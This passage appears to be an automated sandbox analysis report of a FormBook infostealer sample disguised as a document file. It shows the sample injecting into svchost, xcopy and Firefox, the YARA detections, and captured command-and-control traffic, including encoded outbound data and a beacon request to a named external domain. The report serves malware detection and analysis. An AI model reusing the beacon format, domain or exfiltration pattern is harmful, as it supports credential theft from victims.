                                                                                  Data Raw: 35 52 48 3d 77 36 67 2b 58 65 6a 6f 42 31 59 79 42 4a 65 56 65 34 2b 33 37 57 67 68 6e 75 76 6a 74 45 76 63 45 78 57 44 67 55 4f 30 46 6c 4f 38 46 32 4f 4f 72 46 43 4b 6d 57 5a 76 46 31 6f 32 56 72 6d 44 32 78 51 6d 58 38 38 32 53 62 33 30 59 4a 79 68 51 57 41 69 46 2f 38 4c 4d 7a 4e 36 72 35 4f 39 7a 39 2f 50 72 41 66 53 30 32 4f 34 31 46 72 57 45 54 49 49 36 68 62 4d 5a 2f 56 50 31 68 38 67 73 38 79 68 36 38 59 55 46 70 48 70 78 59 2f 30 61 4d 50 42 57 6c 61 73 35 6c 64 6e 39 76 2b 66 77 59 46 4c 71 30 55 55 6d 4f 6b 72 6e 42 4a 78 32 43 34 33 6e 68 65 50 48 4f 56 70 4e 48 5a 6c 73 6a 4f 4c 49 51 33 74 2f 57 73 62 65 56 4c 73 4f 6b 78 44 6f 59 49 65 79 48 44 34 71 66 42 44 66 78 52 4e 59 64 35 71 36 43 78 32 74 47 5a 4b 4c 62 63 6c 31 33 46 41 59 74 36 32 6b 41 37 66 74 72 67 41 78 6d 4d 33 4f 57 53 4f 42 4e 70 61 4a 2b 5a 4f 75 4b 37 48 6e 66 47 58 61 79 38 61 50 63 68 34 71 7a 6f 4d 73 49 38 4e 7a 71 48 33 53 78 50 4c 49 6d 32 65 41 79 68 4b 77 54 4f 68 6e 4f 73 65 65 44 67 64 2b 76 75 37 54 42 [TRUNCATED]
                                                                                  Data Ascii: 5RH=w6g+XejoB1YyBJeVe4+37WghnuvjtEvcExWDgUO0FlO8F2OOrFCKmWZvF1o2VrmD2xQmX882Sb30YJyhQWAiF/8LMzN6r5O9z9/PrAfS02O41FrWETII6hbMZ/VP1h8gs8yh68YUFpHpxY/0aMPBWlas5ldn9v+fwYFLq0UUmOkrnBJx2C43nhePHOVpNHZlsjOLIQ3t/WsbeVLsOkxDoYIeyHD4qfBDfxRNYd5q6Cx2tGZKLbcl13FAYt62kA7ftrgAxmM3OWSOBNpaJ+ZOuK7HnfGXay8aPch4qzoMsI8NzqH3SxPLIm2eAyhKwTOhnOseeDgd+vu7TBMNkPoTL03b05NdjZMJ+7EvLr5IkyRFeWI7BbQ9ygvXdyn8ptEErANJXAJOoSmSQ/WyuQwbGly7rS8/CBUCL5rQo6PG5l6Mp2jNwIyKEOzWCpLMblLrkaYQ0LCTI/6WmJQ40XMyRVGbxeAa496qrQhusnH61Tgbwn4PmPv7LBR4E5Sujd1T6r0y3l0E4p+CrstajhQQXZ9fz0mP1TXk52u8BFNdvA+8ieUIeI7OtkFQ6V/Pa6q/F5lWxo/xAFuZi2m1xMzfGwWaxIeP2/PqZjZY/sLJ2PVO2oeJinpqH4tUFJ77tQcPnjq4Rvgz7Lb/RO61Cb6JeW3D/OxWIFuDbwypmPEP3sfEPvRHPjUSGt+wldiPY7wYb7lk0cMKlJ2dU8VNxf0agYbBaI84wK4mE24eLGKDLUIAk3x70y9DnR8q3CTjqjQsxJXkXC7XfBuB0v4PyTqE27IsqeENALnZPegdbCGytfOt9G3Fm48wMssSF0Cq+ivJLUJTUBou26bRHbjDkVNJGT2fD/lK8TL3xFcy0t+j16KZtedc4UsEwKvFhCBvYcm4N7cgHIvTKYxaK8RIoSk9ptq0rlHBQ2P1NMM4o0KLsx3tT3jszWVg9+5BjzMlzynxw5bOzE5QWoFuj+z4kbejd0soSi2c0aZ6m+RTOfMXNF6xQ7TO [TRUNCATED]
                                                                                  Nov 15, 2024 06:47:07.928212881 CET1646OUTData Raw: 68 37 36 6d 57 31 58 51 6e 31 36 63 5a 68 6d 67 78 38 54 53 55 59 5a 43 68 38 46 6f 58 4c 6e 64 4b 4f 76 77 35 54 6f 52 6b 51 6f 75 44 51 4f 6e 30 72 6b 33 72 32 30 74 43 67 5a 34 4c 48 71 70 6a 51 71 78 46 38 58 4b 72 46 6b 68 59 6a 4c 49 71 41
                                                                                  Data Ascii: h76mW1XQn16cZhmgx8TSUYZCh8FoXLndKOvw5ToRkQouDQOn0rk3r20tCgZ4LHqpjQqxF8XKrFkhYjLIqAY5HSqCGt8hcoKsUPsHAYhbX/gVM8DJpT0wkKqSG8UMt87l3//VTPDWYa5rvAZG/2Tdp6LxVa62vRWrcc3r78BMbDtR/UvsVbZrDdXusgUYz+2PT4SYtnU4WnOuA71dctKQFCJy7Tc+b7aZJIXKXwut2r8S8Yg8VGp


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  25192.168.2.224918613.248.213.4580
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:47:10.464615107 CET423OUTGET /t2sm/?WrGp=yRUDttthc40H6jfP&5RH=94IeUqPLX3ZZBpOCZoSY6HQmnr2N9SvCK3bXujG3CQTlZUuHvWSdlBBRCisXKpTA+iEUA4EAd7TxfJWKcng8Nu4RKxcBvf//lMLbliKMg02h9gbVNiMInhr1eLg3 HTTP/1.1
                                                                                  Host: www.mjmegartravel.online
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Nov 15, 2024 06:47:11.089286089 CET405INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Fri, 15 Nov 2024 05:47:11 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 265
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 57 72 47 70 3d 79 52 55 44 74 74 74 68 63 34 30 48 36 6a 66 50 26 35 52 48 3d 39 34 49 65 55 71 50 4c 58 33 5a 5a 42 70 4f 43 5a 6f 53 59 36 48 51 6d 6e 72 32 4e 39 53 76 43 4b 33 62 58 75 6a 47 33 43 51 54 6c 5a 55 75 48 76 57 53 64 6c 42 42 52 43 69 73 58 4b 70 54 41 2b 69 45 55 41 34 45 41 64 37 54 78 66 4a 57 4b 63 6e 67 38 4e 75 34 52 4b 78 63 42 76 66 2f 2f 6c 4d 4c 62 6c 69 4b 4d 67 30 32 68 39 67 62 56 4e 69 4d 49 6e 68 72 31 65 4c 67 33 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?WrGp=yRUDttthc40H6jfP&5RH=94IeUqPLX3ZZBpOCZoSY6HQmnr2N9SvCK3bXujG3CQTlZUuHvWSdlBBRCisXKpTA+iEUA4EAd7TxfJWKcng8Nu4RKxcBvf//lMLbliKMg02h9gbVNiMInhr1eLg3"}</script></head></html>


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:00:44:59
                                                                                  Start date:15/11/2024
                                                                                  Path:C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe"
                                                                                  Imagebase:0x360000
                                                                                  File size:1'214'976 bytes
                                                                                  MD5 hash:143F37F0DAFE001D882DFCF2F15245A6
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:00:44:59
                                                                                  Start date:15/11/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe"
                                                                                  Imagebase:0xfc0000
                                                                                  File size:20'992 bytes
                                                                                  MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.396307555.00000000002B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.396316461.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.396448093.00000000019D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:00:45:13
                                                                                  Start date:15/11/2024
                                                                                  Path:C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe"
                                                                                  Imagebase:0xe80000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.616973792.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:00:45:15
                                                                                  Start date:15/11/2024
                                                                                  Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\xcopy.exe"
                                                                                  Imagebase:0x2a0000
                                                                                  File size:36'864 bytes
                                                                                  MD5 hash:361D273773994ED11A6F1E51BBB4277E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.616838058.0000000000160000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.616820930.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.616853860.00000000002B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:00:45:27
                                                                                  Start date:15/11/2024
                                                                                  Path:C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe"
                                                                                  Imagebase:0xe80000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.616917024.00000000008E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:00:45:42
                                                                                  Start date:15/11/2024
                                                                                  Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x1000000
                                                                                  File size:517'064 bytes
                                                                                  MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.452537297.0000000000100000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  No disassembly